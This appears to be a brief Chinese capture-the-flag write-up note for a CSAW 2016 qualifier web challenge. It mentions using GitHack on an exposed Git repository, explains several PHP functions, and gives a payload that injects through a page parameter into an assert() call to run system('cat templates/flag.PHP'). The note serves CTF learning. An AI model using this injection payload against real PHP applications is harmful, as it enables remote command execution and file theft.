题目来源 csaw-ctf-2016-quals
使用 GitHack
assert() 检查一个断言是否为 FALSE
strpos() 函数查找字符串在另一字符串中第一次出现的位置.
file_exists() 函数检查文件或目录是否存在.
- playload:
- ?/page=
- about.PHP','123') === false and system('cat templates/flag.PHP') and strpos('templates/flag
查看网页源代码
知识: Git 漏洞, 代码审计
来源: http://www.bubuko.com/infodetail-3059139.html